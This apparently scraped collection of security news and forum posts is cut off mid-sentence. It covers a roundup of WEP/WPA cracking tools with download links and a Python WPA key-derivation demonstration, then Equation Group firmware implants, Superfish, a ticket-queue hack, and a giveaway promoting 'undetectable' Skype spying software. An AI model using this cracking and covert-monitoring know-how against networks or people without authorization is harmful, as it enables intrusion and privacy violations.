Wireless networks are based on the IEEE 802.11 standards defined by the IEEE (Institute of Electrical and Electronics Engineers) for ad hoc networks or infrastructure networks. Infrastructure networks have one or more access points which coordinate the traffic between the nodes. But in ad hoc networks, there is no access point; each node connects in a peer-to-peer way. Basically there are two types of vulnerabilities which can be found in a wireless LAN. One is poor configuration and the other is poor encryption. Poor configuration is caused by the network admin who manages the network. It may include a weak password, no security settings, use of default configurations, and other user-related things. Poor encryption is related to the security keys used to protect the wireless network. It is there because of issues in WEP or WPA.

WEP and WPA

WEP and WPA are the two main security protocols used in Wi-Fi LANs. WEP is known as Wired Equivalent Privacy (WEP). It is a deprecated security protocol which was introduced back in 1997 as a part of the original 802.11 standards. But it was weak, and several serious weaknesses were found in the protocol. Now, this can be cracked within minutes. So, a new kind of security protocol was introduced in 2003. This new protocol was Wi-Fi Protected Access (WPA). It has mainly two versions, 1 and 2 (WPA and WPA2). Now it is the current security protocol used in wireless networks. To get unauthorized access to a network, one needs to crack these security protocols. There are many tools which can crack Wi-Fi encryption. These tools can either take advantage of WEP weaknesses or use brute-force attacks on WPA/WPA2. I am sure now you know that you should never use WEP security.

Basically wireless hacking tools are of two types. One kind can be used to sniff the network and monitor what is happening in the network. And the other kind of tools is used to hack WEP/WPA keys. These are the popular tools used for wireless password cracking and network troubleshooting.

1. Aircrack

Aircrack is one of the most popular wireless password cracking tools which you can use for 802.11a/b/g WEP and WPA cracking. Aircrack uses the best algorithms to recover wireless passwords by capturing packets. Once enough packets have been gathered, it tries to recover the password. To make the attack faster, it implements a standard FMS attack with some optimizations. The company behind the tool also offers an online tutorial where you can learn how to install and use this tool to crack wireless passwords. It comes as Linux distribution, Live CD and VMware image options. You can use any of these. It supports most of the wireless adapters and is almost guaranteed to work. If you are using a Linux distribution, the only drawback of the tool is that it requires deeper knowledge of Linux. If you are not comfortable with Linux, you will find it hard to use this tool. In this case, try the Live CD or VMware image. The VMware image needs less knowledge, but it only works with a limited set of host OSes, and only USB devices are supported. Before you start using this tool, confirm that the wireless card can inject packets. Then start WEP cracking. Read the online tutorial on the website to know more about the tool. If you follow the steps properly, you will end up getting success with this tool.

Download: http://www.aircrack-ng.org/

2. AirSnort

AirSnort is another popular tool for decrypting WEP encryption on a wi-fi 802.11b network. It is a free tool and comes for the Linux and Windows platforms. This tool is no longer maintained, but it is still available to download from Sourceforge. AirSnort works by passively monitoring transmissions and computing encryption keys once it has received enough packets. This tool is simple to use. If you are interested, you can try this tool to crack WEP passwords.

Download: http://sourceforge.net/projects/airsnort/

3. Cain & Abel

Cain & Abel is a popular password cracking tool. This tool is developed to intercept network traffic and then discover passwords by brute-forcing the password using cryptanalysis attack methods. It can also recover wireless network keys by analyzing routing protocols. If you are trying to learn wireless security and password cracking, you should try this tool once.

Download: http://www.oxid.it/cain.html

4. Kismet

Kismet is the wi-fi 802.11 a/b/g/n layer-2 wireless network sniffer and IDS. It works with any wi-fi card which supports rfmon mode. It passively collects packets to identify networks and detect hidden networks. It is built on a client/server modular architecture. It is available for Linux, OSX, Windows and BSD platforms.

Download: http://www.kismetwireless.net/

5. NetStumbler

NetStumbler is a popular Windows tool to find open wireless access points. This tool is free and is available for Windows. A trimmed-down version of the tool is also available. It is called MiniStumbler. Basically NetStumbler is used for wardriving, verifying network configurations, finding locations with a poor network, detecting unauthorized access points, and more. But the tool also has a big disadvantage. It can be easily detected by most of the wireless intrusion detection systems available. This is because it actively probes a network to collect useful information. Another disadvantage of the tool is that it does not work properly with the latest 64-bit Windows OS. This is because the tool was last updated back in April 2004. It has been around 11 years since the last stable release of the tool.

Download NetStumbler: http://www.stumbler.net/

6. inSSIDer

inSSIDer is a popular Wi-Fi scanner for Microsoft Windows and OS X operating systems. Initially the tool was open source. Later it became premium and now costs $19.99. It was also awarded "Best Opensource Software in Networking". The inSSIDer wi-fi scanner can do various tasks, including finding open wi-fi access points, tracking signal strength, and saving logs with GPS records.

Download inSSIDer: http://www.inssider.com/

7. Wireshark

Wireshark is the network protocol analyzer. It lets you check what is happening in your network. You can live-capture packets and analyze them. It captures packets and lets you check data at the micro level. It runs on Windows, Linux, OS X, Solaris, FreeBSD and others. Wireshark requires good knowledge of network protocols to analyze the data obtained with the tool. If you do not have good knowledge of that, you may not find this tool interesting. So, try it only if you are sure about your protocol knowledge.

Download Wireshark: https://www.wireshark.org/

8. CoWPAtty

CoWPAtty is an automated dictionary attack tool for WPA-PSK. It runs on Linux OS. This program has a command line interface and runs on a word-list that contains the passwords to use in the attack. Using the tool is really simple, but it is slow. That's because the hash uses SHA1 with a seed of the SSID. It means the same password will have a different hash for each SSID. So, you cannot simply use a rainbow table against all access points. So, the tool uses the password dictionary and generates the hash for each word contained in the dictionary by using the SSID. The new version of the tool tried to improve the speed by using a pre-computed hash file. This pre-computed file contains around 172,000 dictionary words for around 1,000 of the most popular SSIDs. But if your SSID is not in those 1,000, you are unlucky.

Download CoWPAtty: http://sourceforge.net/projects/cowpatty/

9. AirJack

AirJack is a Wi-Fi 802.11 packet injection tool. This wireless cracking tool is very useful in injecting forged packets and taking a network down by a denial of service attack. This tool can also be used for a man-in-the-middle attack in the network.

Download AirJack: http://sourceforge.net/projects/airjack/

10. WepAttack

WepAttack is an open source Linux tool for breaking 802.11 WEP keys. This tool performs an active dictionary attack by testing millions of words to find the working key. Only a working WLAN card is required to work with WepAttack.

Download WepAttack: http://wepattack.sourceforge.net/

11. OmniPeek

OmniPeek is another nice packet sniffer and network analyzer tool. This tool is commercial and supports only Windows operating systems. This tool is used to capture and analyze wireless traffic. But it requires you to have good knowledge of protocols to properly understand things. A good thing is that the tool works with most of the network interface cards available on the market. This tool is used for network troubleshooting. This tool also supports plugins, and 40 plugins are already available to extend the features of the tool.

Download: http://www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer

12. CommView for WiFi

CommView for WiFi is another popular wireless monitor and packet analyzer tool. It comes with an easy-to-understand GUI. It works fine with 802.11 a/b/g/n/ac networks. It captures every packet and displays useful information as a list. You can get useful information like access points, stations, signal strength, network connections and protocol distribution. Captured packets can be decrypted with user-defined WEP or WPA keys. This tool is basically for wi-fi network admins, security professionals, home users who want to monitor their wi-fi traffic, and programmers working on software for wireless networks.

Download CommView: http://www.tamos.com/products/commwifi/

13. CloudCracker

CloudCracker is an online password cracking tool for cracking WPA-protected wi-fi networks. This tool can also be used to crack different password hashes. Just upload the handshake file, enter the network name and start the tool. This tool has a huge dictionary of around 300 million words to perform attacks.

Try CloudCracker: https://www.cloudcracker.com/

Conclusion

In this post, I discussed 13 wireless hacking tools. A few wireless hacking tools are for cracking the password to get unauthorized access, and a few are for monitoring and troubleshooting the network. But most of the people really interested in tools to crack wireless hotspots just want to get free Internet access. The above collection also contains those tools which try a dictionary attack to crack wi-fi passwords to allow you to get free Internet access. But be sure not to use these tools in a risky place.
Hacking wireless networks to get unauthorized access may be a crime in your country. You may get into trouble for using these tools. So, please do not use these tools for illegal works. As I already mentioned, you should never use the WEP encryption key in your home or wireless network. With available tools, it is child’s play to crack the WEP keys and access your wi-fi network. Wireless monitoring and troubleshooting tools are basically for network admins and programmers working on wi-fi based software. These tools really help when some of your systems face problems in connecting to the network. I hope you enjoyed this article and got relevant information about popular wireless hacking and password cracking tools. I tried my best to compile this list of password hacking tools, but as a human error, I may miss something. If I forgot any important tool in this, please let me know in the comments. Source
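The CoWPAtty paragraph above says the tool is slow because "the hash uses SHA1 with a seed of SSID", and that a pre-computed hash file only helps for the SSIDs it was built for. The following Python is an added example written for this page; it is not code from the original post or from the CoWPAtty project. It reproduces the key derivation every WPA/WPA2-PSK supplicant performs (PBKDF2-HMAC-SHA1, 4096 rounds, SSID as salt, as specified in IEEE 802.11i) and shows why a table computed for one network name says nothing about another. The sample wordlist and network names are constructed for the demonstration.

```python
"""WPA/WPA2-PSK key derivation: why the SSID acts as a salt.

Added example, not code from the original post or from CoWPAtty. It shows the
PBKDF2 step the post describes: the passphrase is stretched with 4096 rounds
of HMAC-SHA1, salted with the SSID (IEEE 802.11i-2004, clause 8.5.1), so a
table of hashes precomputed for one network name is useless for any other.
"""
import hashlib
from typing import Dict, Iterable

PBKDF2_ROUNDS = 4096   # fixed by the 802.11i standard
PMK_LEN = 32           # 256-bit Pairwise Master Key


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the Pairwise Master Key (PMK) exactly as a WPA supplicant does."""
    # The standard restricts passphrases to 8..63 printable ASCII characters.
    if not 8 <= len(passphrase) <= 63 or not passphrase.isascii():
        raise ValueError("passphrase must be 8..63 ASCII characters")
    return hashlib.pbkdf2_hmac(
        "sha1",
        passphrase.encode("ascii"),
        ssid.encode("utf-8"),  # the SSID is the salt
        PBKDF2_ROUNDS,
        PMK_LEN,
    )


def build_pmk_table(ssid: str, wordlist: Iterable[str]) -> Dict[bytes, str]:
    """Precompute PMK -> word for ONE SSID (the idea behind a pre-computed hash file)."""
    table: Dict[bytes, str] = {}
    for word in wordlist:
        if 8 <= len(word) <= 63 and word.isascii():
            table[derive_pmk(word, ssid)] = word
    return table


def table_covers(table: Dict[bytes, str], passphrase: str, ssid: str) -> bool:
    """True if a table precomputed for some SSID matches this passphrase on this SSID."""
    return derive_pmk(passphrase, ssid) in table


# Constructed sample data for the demonstration (not real networks or credentials).
SAMPLE_WORDLIST = ["password", "letmein1", "sunshine", "qwerty123"]


def demo() -> dict:
    """Compare a table built for the (hypothetical) SSID 'linksys' against two networks."""
    table_for_linksys = build_pmk_table("linksys", SAMPLE_WORDLIST)
    return {
        # same passphrase, same SSID: the precomputed table finds it at once
        "same_ssid_hit": table_covers(table_for_linksys, "sunshine", "linksys"),
        # same passphrase, different SSID: every entry in the table is worthless
        "other_ssid_hit": table_covers(table_for_linksys, "sunshine", "HomeNet-7f3a"),
        # a passphrase outside the wordlist is never found, whatever the SSID
        "strong_passphrase_hit": table_covers(
            table_for_linksys, "correct horse battery", "linksys"
        ),
    }


if __name__ == "__main__":
    # Known-answer check from IEEE 802.11i Annex H: passphrase "password", SSID "IEEE".
    print(derive_pmk("password", "IEEE").hex())
    print(demo())
```

The defender's takeaway is the combination the code makes visible: a non-default SSID pushes the network out of any prebuilt table, and a passphrase that is not in a wordlist forces 4096 HMAC-SHA1 rounds per guess per network, which is what makes the attack the post calls "really simple, but slow".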
-
One of the most shocking parts of the recently discovered spying network Equation Group is its mysterious module designed to reprogram or reflash a computer hard drive’s firmware with malicious code. The Kaspersky researchers who uncovered this said its ability to subvert hard drive firmware—the guts of any computer—“surpasses anything else” they had ever seen. The hacking tool, believed to be a product of the NSA, is significant because subverting the firmware gives the attackers God-like control of the system in a way that is stealthy and persistent even through software updates. The module, named “nls_933w.dll”, is the first of its kind found in the wild and is used with both the EquationDrug and GrayFish spy platforms Kaspersky uncovered. It also has another capability: to create invisible storage space on the hard drive to hide data stolen from the system so the attackers can retrieve it later. This lets spies like the Equation Group bypass disk encryption by secreting documents they want to seize in areas that don’t get encrypted. Kaspersky has so far uncovered 500 victims of the Equation Group, but only five of these had the firmware-flashing module on their systems. The flasher module is likely reserved for significant systems that present special surveillance challenges. Costin Raiu, director of Kaspersky’s Global Research and Analysis Team, believes these are high-value computers that are not connected to the internet and are protected with disk encryption. Here’s what we know about the firmware-flashing module. How It Works Hard drive disks have a controller, essentially a mini-computer, that includes a memory chip or flash ROM where the firmware code for operating the hard drive resides. When a machine is infected with EquationDrug or GrayFish, the firmware flasher module gets deposited onto the system and reaches out to a command server to obtain payload code that it then flashes to the firmware, replacing the existing firmware with a malicious one. 
The researchers uncovered two versions of the flasher module: one that appears to have been compiled in 2010 and is used with EquationDrug and one with a 2013 compilation date that is used with GrayFish. The Trojanized firmware lets attackers stay on the system even through software updates. If a victim, thinking his or her computer is infected, wipes the computer’s operating system and reinstalls it to eliminate any malicious code, the malicious firmware code remains untouched. It can then reach out to the command server to restore all of the other malicious components that got wiped from the system. Even if the firmware itself is updated with a new vendor release, the malicious firmware code may still persist because some firmware updates replace only parts of the firmware, meaning the malicious portions may not get overwritten with the update. The only solution for victims is to trash their hard drive and start over with a new one. The attack works because firmware was never designed with security in mind. Hard disk makers don’t cryptographically sign the firmware they install on drives the way software vendors do. Nor do hard drive disk designs have authentication built in to check for signed firmware. This makes it possible for someone to change the firmware. And firmware is the perfect place to conceal malware because antivirus scanners don’t examine it. There’s also no easy way for users to read the firmware and manually check if it’s been altered. The firmware flasher module can reprogram the firmware of more than a dozen different hard drive brands, including IBM, Seagate, Western Digital, and Toshiba. “You know how much effort it takes to land just one firmware for a hard drive? You need to know specifications, the CPU, the architecture of the firmware, how it works,” Raiu says. 
The Kaspersky researchers have called it “an astonishing technical accomplishment and is testament to the group’s abilities.” Once the firmware is replaced with the Trojanized version, the flasher module creates an API that can communicate with other malicious modules on the system and also access hidden sectors of the disk where the attackers want to conceal data they intend to steal. They hide this data in the so-called service area of the hard drive disk where the hard disk stores data needed for its internal operation. Hidden Storage Is the Holy Grail The revelation that the firmware hack helps store data the attackers want to steal didn’t get much play when the story broke last week, but it’s the most significant part of the hack. It also raises a number of questions about how exactly the attackers are pulling this off. Without an actual copy of the firmware payload that gets flashed to infected systems, there’s still a lot that’s unknown about the attack, but some of it can be surmised. The ROM chip that contains the firmware includes a small amount of storage that goes unused. If the ROM chip is 2 megabytes, the firmware might take up just 1.5 megabytes, leaving half a megabyte of unused space that can be employed for hiding data the attackers want to steal. This is particularly useful if the computer has disk encryption enabled. Because the EquationDrug and GrayFish malware run in Windows, they can grab a copy of documents while they’re unencrypted and save them to this hidden area on the machine that doesn’t get encrypted. There isn’t much space on the chip for a lot of data or documents, however, so the attackers can also just store something equally as valuable to bypass encryption. “Taking into account the fact that their GrayFish implant is active from the very boot of the system, they have the ability to capture the encryption password and save it into this hidden area,” Raiu says. 
Authorities could later grab the computer, perhaps through border interdiction or something the NSA calls “customs opportunities,” and extract the password from this hidden area to unlock the encrypted disk. Raiu thinks the intended targets of such a scheme are limited to machines that are not connected to the internet and have encrypted hard drives. One of the five machines they found hit with the firmware flasher module had no internet connection and was used for special secure communications. “[The owners] only use it in some very specific cases where there is no other way around it,” Raiu says. “Think about Bin Laden who lived in the desert in an isolated compound—doesn’t have internet and no electronic footprint. So if you want information from his computer how do you get it? You get documents into the hidden area and you wait, and then after one or two years you come back and steal it. The benefits [of using this] are very specific.” Raiu thinks, however, that the attackers have a grander scheme in mind. “In the future probably they want to take it to the next level where they just copy all the documents [into the hidden area] instead of the password. [Then] at some point, when they have an opportunity to have physical access to the system, they can then access that hidden area and get the unencrypted docs.” They wouldn’t need the password if they could copy an entire directory from the operating system to the hidden sector for accessing later. But the flash chip where the firmware resides is too small for large amounts of data. So the attackers would need a bigger hidden space for storage. Luckily for them, it exists. There are large sectors in the service area of the hard drive disk that are also unused and could be commandeered to store a large cache of documents, even ones that might have been deleted from other parts of the computer. 
This service area, also called the reserved area or system area, stores the firmware and other data needed to operate drives, but it also contains large portions of unused space. An interesting paper (.pdf) published in February 2013 by Ariel Berkman, a data recovery specialist at the Israeli firm Recover, noted “not only that these areas can’t be sanitized (via standard tools), they cannot be accessed via anti-virus software [or] computer forensics tools.” Berkman points out that one particular model of Western Digital drives has 141 MB reserved for the service area, but only uses 12 MB of this, leaving the rest free for stealth storage. To write or copy data to the service area requires special commands that are specific to each vendor and are not publicly documented, so an attacker would need to uncover what these are. But once they do, “[b]y sending Vendor Specific Commands (VSCs) directly to the hard-drive, one can manipulate these [service] areas to read and write data that are otherwise inaccessible,” Berkman writes. It is also possible, though not trivial, to write a program to automatically copy documents to this area. Berkman himself wrote a proof-of-concept program to read and write a file of up to 94 MB to the service area, but the program was a bit unstable and he noted that it could cause some data loss or cause the hard drive to fail. One problem with hiding large amounts of data like this, however, is that its presence might be detected by examining the size of the used space in the service area. If there should be 129 MB of unused space in this sector but there’s only 80 MB, it’s a dead giveaway that something is there that shouldn’t be. But a leaked NSA document that was written in 2006 but was published by Der Spiegel last month suggests the spy agency might have resolved this particular problem. 
NSA Interns to the Rescue The document (.pdf) is essentially a wish list of future spy capabilities the NSA hoped to develop for its so-called Persistence Division, a division that has an attack team within it that focuses on establishing and maintaining persistence on compromised machines by subverting their firmware, BIOS, BUS or drivers. The document lists a number of projects the NSA put together for interns to tackle on behalf of this attack team. Among them is the “Covert Storage” project for developing a hard drive firmware implant that can prevent covert storage on disks from being detected. To do this, the implant prevents the system from disclosing the true amount of free space available on the disk. “The idea would be to modify the firmware of a particular hard drive so that it normally only recognizes, say, half of its available space,” the document reads. “It would report this size back to the operating system and not provide any way to access the additional space.” Only one partition of the drive would be visible on the partition table, leaving the other partitions—where the hidden data was stored—invisible and inaccessible. The modified firmware would have a special hook embedded in it that would unlock this hidden storage space only after a custom command was sent to the drive and the computer was rebooted. The hidden partition would then be available on the partition table and accessible until the secret storage was locked again with another custom command. How exactly the spy agency planned to retrieve the hidden data was unclear from the eight-year-old document. Also unclear is whether the interns ever produced a firmware implant that accomplished what the NSA sought. But given that the document includes a note that interns would be expected to produce a solution for their project within six months after assignment, and considering the proven ingenuity of the NSA in other matters, they no doubt figured it out. Source
-
Burning Man has practically gone mainstream. The once-fringe desert camping festival is now cultural fodder for The Simpsons and Taco Bell commercials. Celebrities and CEOs routinely attend. So it’s no surprise that 40,000 Burning Man tickets sold out in less than an hour last Wednesday when they went on sale. But software engineers in Silicon Valley hacked into the Burning Man ticketing system powered by Ticketfly to cut to the front of the queue. Who needs luck when you have engineering skills and you’re willing to use ‘em for your advantage? Well, apparently everyone. Burning Man officials, not ones to let cosmic karma pass them by, announced on Friday that they will find and cancel the hacked ticket orders. “The good news (for us, not them) is that we can track them down, and we’re going to cancel their orders,” according to Megan K. Miller, Burning Man’s director of communications. “Steps are being taken to prevent this from happening again in future sales.” While 80,000 would-be Burners all over the world waited their turn in a so-called “first come first serve” online queue to purchase tickets, 200 software-savvy engineers discovered a design flaw on the ticket page that allowed them to generate a spot ahead of everyone else in line. During the ticket sale, Rob Banagale, the San Mateo-based founder of the Gliph messaging app, tweeted that he had “figured out a hack” to get to the front of the line and had the screenshot to prove it. Similarly, Jonathan Hart, a software engineer at Idle Games in San Francisco, tweeted that he had somehow navigated Ticketfly’s web servers and “crawled out” with two tickets to Burning Man. During the ticket sale, more reports continued to surface on social media claiming Ticketfly had somehow been susceptible to hacking. Even before tickets officially sold out, the perception that hackers were cheating the system was so prevalent that it quickly became a source of both resentment and parody among Twitter users. 
On Thursday, Burning Man’s top brass released a statement after compiling technical information from Ticketfly, confirming that a backdoor had been created by hackers. “Approximately 200 people created a technical ‘backdoor’ to the sale and made their way to the front of the line,” according to the statement. “Absolutely no tickets were sold before the sale opened, but they were able to purchase the first batch of tickets when the sale started.” Several engineers and web developers on a Burning Man Reddit thread speculated that hackers were able to create this backdoor after discovering a few lines of JavaScript code on the ticketing website that gave preeminent access to tickets three minutes before they officially went on sale at noon on Wednesday. “They left code in the page that allowed you to generate the waiting room URL ahead of time,” said Michael Vacirca, a software engineer at a large defense corporation. “If you knew how to form the URL based on the code segment then you could get in line before everyone else who clicked right at noon.” Burning Man admits the error and says those hacked tickets will be put back up for grabs during the scheduled last-minute sale in August. The Burning Man ticket distribution system has always been met with its fair share of criticism. Whether the tickets were distributed via a lottery system or a website that kept on crashing, the fact is that there have never been enough tickets to meet the demand. There will always be those Burning Man hopefuls who feel like they’ve been cheated out of their destined spot to adult Disneyland. The way this year’s sale operated, however, didn’t help to dissipate the resentment. Those interested in purchasing tickets were placed in an online queue as each sale was processed and given a time estimate as to how long they would be kept waiting before they could purchase tickets. 
The time estimates kept shifting, going from a 24-minute wait, to 46 minutes, back down to 18 minutes, to then “more than an hour,” which might as well have read, “abandon all hope ye who enter here.” At one point, the line was inexplicably “paused” for several minutes, causing another nerve-wracking moment on social media. This drastic, back-and-forth change in wait times gave those in line the illusion that somehow hackers were cutting in front of them and bumping them out of scoring tickets. Burning Man’s social media team responded by saying that the wait times fluctuated based on how long it took each buyer to complete the purchase. It surely didn’t qualm any anxiety to have used such an unpredictable factor as a counter, instead of a fixed number (“There are 39,999 people in front of you trying to buy tickets”). This is not the first time Silicon Valley has been criticized for tampering with Burning Man’s ideals and processes. Last year’s festival garnered unflattering feedback from Burning Man die-hards after venture capitalists, executives and celebrities descended on the desert with air-conditioned camps, personal assistants and other VIP-perks. In recent years, Larry Page, Sergey Brin, Elon Musk, Jeff Bezos and Mark Zuckerberg have all scored tickets to Burning Man. It seems like now, Silicon Valley is leveraging more than its money to get in front of the line. Source
-
Facebook security researcher Matt Richard says The Social Network™ has found at least ten more outfits using the library that gave the Superfish bloat/ad/malware its nasty certificate-evading powers. Richard, a “threats researcher” on Facebook's security team, writes that in 2012 Facebook “... started a project with researchers from Carnegie Mellon University to measure how prevalent SSL MITM.” That effort, he says, found “certain deep packet inspection (DPI) devices were using the same private key across devices, which can be exploited by an attacker with the capacity to extract the key from any single device.” “Superfish is similar in that it uses the same private key across all clients, but it's more dangerous because its root certificate is installed on significantly more clients than those behind the vulnerable DPI devices.” The post goes on to say that the fake certificates Superfish issued for Facebook “used weak 1024-bit RSA keys and were directly signed by the universal root certificate with no intermediate certificates in the chain.” The researcher also says Facebook's probe into Superfish has revealed another ten outfits using the same Komodia library that gives the Lenovo-spawn its cert-jacking powers. The operators listed in the post are:

CartCrunch Israel LTD
WiredTools LTD
Say Media Group LTD
Over the Rainbow Tech
System Alerts
ArcadeGiant
Objectify Media Inc
Catalytix Web Services
OptimizerMonitor

“We can’t say for certain what the intentions of these applications are, but none appear to explain why they intercept SSL traffic or what they do with data,” Richard writes, also suggesting that “the Komodia library is easy to detect” for the following reasons: “In our research, we found that the software that installs the root CA contains a number of easily searchable attributes that enabled us to match up the certificates we see in the wild with the actual software. 
These functions, which are Windows PE exports, include 'CertInstallAll', 'GetCertPEMDLL', 'InstallFirefoxDirectory', 'SetCertDLL', and 'SetLogFunctionDLL.' Most of these libraries are designed to work on Windows 8 and will not install on older operating systems.” Source
-
Android phones can be tracked without using their GPS or wi-fi data by studying their power use over time, a study has found. A smartphone uses more power the further away it is from a cellular base and the more obstacles are in its way as it reaches for a signal. Additional power use by other activities could be factored out with algorithms, the researchers found. They created an app designed to collect data about power consumption. "The malicious app has neither permission to access the GPS nor other location providers (eg cellular or wi-fi network)," the team - Yan Michalevsky, Dan Boneh and Aaron Schulman, from the computer science department at Stanford University, along with Gabi Nakibly, from Rafael Ltd - wrote in their paper. "We only assume permission for network connectivity and access to the power data. "These are very common permissions for an application, and are unlikely to raise suspicion on the part of the victim." There are 179 apps currently available on Android app store Google Play that request this information, the team add. Activity such as listening to music, activating maps, taking voice calls or using social media all drain the battery but this can be discounted due to "machine learning", the report says. "Intuitively the reason why all this noise does not mislead our algorithms is that the noise is not correlated with the phone's location," it says. "Therefore a sufficiently long power measurement (several minutes) enables the learning algorithm to 'see' through the noise." The tests were carried out on phones using the 3G network but did not measure signal strength as that data is protected by the device. 'Stuffed with sensors' "With mobile devices now becoming ubiquitous, it is troubling that we are seeing so many ways in which they can be used to track us," said cyber-security expert Prof Alan Woodward, from Surrey University. 
"I think people sometimes forget that smartphones are stuffed full of sensors from gyroscopes and GPS to the more obvious microphones and cameras. "This latest work shows that even that basic characteristics (power consumption) has the potential to invade privacy if monitored in the right way," he added. "We are approaching the point where the only safe way to use your phone is to pull the battery out - and not all phones let you do that." Source
-
Cisco has announced that NCS 6000 and Carrier Routing System (CRS-X) – heavy hunks of iron used in the service provider market – have an IPv6 software bug that needs patching. The bug impacts the ways Cisco IOS XR units parse IPv6 packets and an attack exploiting the problem could result in a forced restart of the line card that's processing the traffic. “An attacker could exploit this vulnerability by sending a malformed IPv6 packet, carrying extension headers, through an affected Cisco IOS XR device line card,” the company's advisory states. “This vulnerability could be exploited repeatedly to cause an extended DoS condition.” Of course, it's only a problem if you're actually processing IPv6 traffic using the vulnerable IOS XR software. It's also restricted to traffic that's transiting the affected device: traffic transiting the device on the way somewhere else won't trigger the bug. For the Cisco NCS 6000, all versions of the IOS XR software except 5.3.2 are affected. For IOS XR for CRS-X, all versions that support CRS-X line cards, including the 400 Gbps Modular Service Card (MSC) and 400 Gbps Forwarding Processor Cards, the safe version is 5.3.0 – all other versions are vulnerable. The bug has been designated CVE-2015-0618. Source
-
Lenovo has teamed up with Microsoft and McAfee to remove the Superfish adware from its machines, following concerns about security. Lenovo announced the partnerships in a public statement, promising that the tools will let users automatically block and remove the insecure, self-signing certificates used by Superfish. "We are working with McAfee and Microsoft to have the Superfish software and certificate quarantined or removed using their industry-leading tools and technologies," the firm said. "These actions have already started and will automatically fix the vulnerability even for users who are not currently aware of the problem." The Microsoft removal tool will be integrated into Windows Defender version 1.193.444.0. The tools are the latest step in Lenovo's bid to allay customer concerns that the firm put personal data at risk. The problem erupted on the Lenovo forum earlier in February when several customers reported finding Superfish installed on their machines. Superfish is adware that collects data such as web traffic information using fake, self-signed root certificates and then uses it to push advertisements to the user. Lenovo claims that the adware is installed on only a limited number of machines and does not affect its business-focused Thinkpad line. "We ordered Superfish preloads to stop and had server connections shut down in January based on user complaints about the experience," read the statement. "While this issue in no way impacts our ThinkPads, any tablets, desktops or smartphones, or any enterprise server or storage device, we recognise that all Lenovo customers need to be informed." Lenovo apologised for causing concern, but argued that the company never knowingly compromised its customers' privacy. "We apologise for causing these concerns among our users. We are learning from this experience and will use it to improve what we do and how we do it in the future," read the statement. 
"Superfish technology is purely based on contextual/image and not behavioural. It does not profile or monitor user behavior. It does not record user information. It does not know who the user is. Users are not tracked nor re-targeted." Lenovo is one of many firms dealing with privacy and security concerns. Researchers at FireEye reported on 20 February that Apple had ignored a dangerous flaw in the iOS operating system, codenamed Masque Attack II. Source
-
@Bosketar. Yes, I saw at the bottom, in red, "Deal Expires in: 1 day(s) 9 hour(s)" and thought it had expired, which is why I re-posted the program. On: I see they have extended the offer for one more day.
-
@Maverick the prices are quite OK now (after you lowered them); what can I say, good luck with the site. It will be hard at the beginning anyway (because there are very many who offer similar services at extremely low prices, because they can afford to). It would be good to also do something like "50 likes/votes free" if you bring in 10 clients! "Advertising in exchange for advertising."
-
Skype Spy USB Edition software allows you to monitor and track all Skype chats and activities, such as file transfers or calls. You can search monitored Skype data, make copies of data, and restore the data as well. Best of all, Skype Spy USB Edition is portable — you can easily run it from USB flash drive and use it on any computer without installation. In this way the app stays completely undetectable. It is a great option for anyone looking for an effective parental control solution or employee monitoring software. Free Skype Spy USB Edition (100% discount) 4 more days until it expires.
-
PowerISO is a powerful CD / DVD / BD disc image file processing tool that allows you to open, extract, burn, create, edit, compress, encrypt, split and convert ISO files, and mount ISO files with internal virtual drive. It can process almost all CD / DVD / BD disc image files (ISO, BIN, NRG, CDI, DAA, and so on). PowerISO provides an all-in-one solution for disc image management needs. Free PowerISO (100% discount) The promotion ends in 15h.
-
It was already posted here by Usr6, but that offer expired, so here I am with a new one. Free OkayFreedom VPN Premium (100% discount) Hurry up!
-
Privacy International (PI) is calling on people to sign up to be part of a mass request for confirmation that they have been spied on by Five Eyes spy agencies, and to demand the removal of captured information. Would-be signatories are being asked to submit their name and email address to the organisation, which will then pass them on to Britain's Investigatory Powers Tribunal, tasked with determining if the sharing of NSA-intercepted material with the UK's GCHQ spy agency was illegal. The requests would cover a prodigious amount of data, numbering billions of records, hoovered up by the NSA and shared with GCHQ until December last year. PI will not reveal if agencies other than the NSA collected data; the requests would cover only data shipped to GCHQ. This could conceivably include data captured by any Five Eyes agency and shared with GCHQ via the NSA. The offer came on the heels of the tribunal's ruling this month, in favour of Privacy International, that the mass funnelling of intelligence information between Britain and the United States was illegal prior to December. That decision, made on the grounds that the rules governing the exchange were secret, opened an avenue for users to request that the tribunal examine and notify them if their data was illegally obtained and, if found in breach, for the information to be destroyed. The British charity dubbed the ruling a "major victory against the Five Eyes", a group of nations which includes Australia, New Zealand and Canada, and said it was possible only due to the flurry of NSA leaks from Edward Snowden. "Through their secret intelligence sharing relationship with the NSA, GCHQ has had intermittently unrestricted access to PRISM - NSA's means of directly accessing data and content handled by some of the world's largest Internet companies, including Microsoft, Yahoo, Google, Facebook, PalTalk, AOL, Skype, YouTube and Apple," deputy director Eric King said at the time.
"GCHQ's access to NSA material therefore makes up the large bulk of all surveillance material handled by the security services; some ex-GCHQ staffers estimated that 95 per cent of all signals intelligence material handled at GCHQ is American. "The extraordinary implications of [the] judgement is that all historical sharing of raw intelligence between NSA and GCHQ took place without an adequate legal framework, and thus was unlawful." The Tribunal will likely be swamped if the campaign takes off. Probes could trawl records collected from NSA programmes UPSTREAM, CO-TRAVELLER, and DISHFIRE, the former having intercepted some 160 billion records from its top five programmes in one month alone. Privacy International said requests could take years to be fulfilled. New requests could be made to discover the data collected by individual agencies up to the current day if the charity is successful in its appeal with the European Court of Human Rights against the decision that the data shared between the US and UK spy agencies was kosher, due to the policies of the arrangement being made public as a result of the legal action. Source
-
US President Barack Obama has come out forcefully in favour of strong encryption despite the opposition of his intelligence establishment. Encryption has been a hot topic over recent weeks, with Western law enforcement and intelligence agencies complaining about encryption-by-default in modern communication tools such as smartphones. Prime Minister David Cameron recently began pushing the idea of banning crypto products that UK spies are unable to access, an idea he first floated in a recent speech before lobbying US President Barack Obama on the issue, seemingly unsuccessfully. In an interview with Re/code, Obama said that he's a "strong believer in strong encryption," adding, "I lean probably further on side of strong encryption than some in law enforcement". "Ultimately everybody, and certainly this is true for me and my family, we all want to know that if we're using a smartphone for transactions, sending messages, having private conversations, that we don't have a bunch of people compromising that process," Obama explained. "There's no scenario in which we don't want really strong encryption." The president went on to claim that public concern about stymieing terrorism investigations is behind legislators' concerns about encryption. "Where there is a situation in which we're trying to get a specific case of a possible national security threat — is there a way of accessing it? If it turns out it's not, then we're really gonna have to have a public debate," Obama said. "And, you know, I think some in Silicon Valley would make the argument that the harms done by having any 